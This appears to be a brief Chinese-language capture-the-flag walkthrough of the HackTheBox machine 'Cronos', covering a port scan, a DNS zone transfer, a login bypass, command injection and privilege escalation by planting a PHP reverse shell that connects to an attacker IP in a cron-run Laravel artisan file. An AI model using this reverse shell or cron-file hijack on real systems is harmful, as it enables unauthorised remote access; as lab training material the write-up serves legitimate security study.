0%

HackTheBox-Cronos

练习,OSCP LIKE

1
2
3
4
5
6
$ nmap -T4 cronos.htb -p-
Not shown: 65532 filtered ports
PORT STATE SERVICE
22/tcp open ssh
53/tcp open domain
80/tcp open http

DNS 区域传输漏洞.

1
dig axfr @10.129.30.241 cronos.htb

20210410-18:43:55-_MpeHjJ_Yraghg

万能密码可绕过。

20210410-18:44:39-_puhqD2_9pzQ7n

20210410-18:45:17-_8ZOCzZ_YqnVmQ

改改command的值

20210410-18:45:57-_slAfBM_qRHESd

20210410-18:55:27-_51hvFE_fiKYPg

20210410-19:06:42-_TqPLKC_Yo6A0N

1
2
3
(remote) [email protected]:/$ ls -la /var/www/laravel/artisan
-rwxr-xr-x 1 www-data www-data 1646 Apr 9 2017 /var/www/laravel/artisan
(remote) [email protected]:/$ vim /var/www/laravel/artisan

文件可写。我直接在文件开头写入以下内容。

1
$sock=fsockopen("10.10.16.69",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);

20210410-19:08:19-_lUq7zm_Ohr5mY

监听。getshell

20210410-19:01:38-_oWuYGd_Qg62Cz